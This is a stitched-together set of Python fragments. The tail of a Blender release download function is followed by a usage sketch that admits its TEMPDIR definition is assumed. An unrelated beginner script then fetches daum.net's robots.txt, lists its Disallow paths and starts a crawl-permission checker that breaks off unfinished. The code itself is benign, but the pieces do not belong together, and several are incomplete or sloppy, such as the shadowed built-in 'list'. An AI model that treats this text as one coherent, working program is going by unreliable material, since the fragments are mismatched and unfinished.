    # move from the temporary directory to the real output path
    os.rename(tmp_output_filepath, output_filepath)
    return output_filepath
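A hedged usage sketch for the function above. The imports mirror what the function body uses; TEMPDIR is assumed to be a module-level constant (here derived from tempfile.gettempdir(), which is an assumption), and the release URL is illustrative.

import os
import sys
import tempfile
from urllib.parse import urlsplit
from urllib.request import urlopen, Request

from tqdm import tqdm

TEMPDIR = os.path.join(tempfile.gettempdir(), "blender-downloader")  # assumed definition

# filepath = download_release(
#     "https://download.blender.org/release/Blender2.93/blender-2.93.0-linux-x64.tar.xz",
#     output_directory=".",
# )
# print(filepath)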
from urllib import request
import io

url = "http://www.daum.net/robots.txt"
response = request.urlopen(url)
string = request.urlsplit(url)
print(response)

aa = io.TextIOWrapper(response, 'utf-8')
bb = aa.read()
print(bb.startswith("User-agent"))

list = [
    string[string.index(":") + 1::].strip(" ")
    for string in bb.split("\n")
    if string.startswith("Disallow")
]
print(list)


def checkcrolling(url):
    urlspli = request.urlsplit(url)
    netloc = urlspli.netloc
    path = urlspli.path
    robots = urlspli.scheme + "://" + netloc + "/robots.txt"
    response = request.urlopen(robots)
    wrapper = io.TextIOWrapper(response, 'utf-8')
    read = wrapper.read()
    if read.startswith("User-agent"):
        disallowlist = [
            string[string.index(":") + 1::].strip(" ")
            for string in read.split("\n")
            if string.startswith("Disallow")
        ]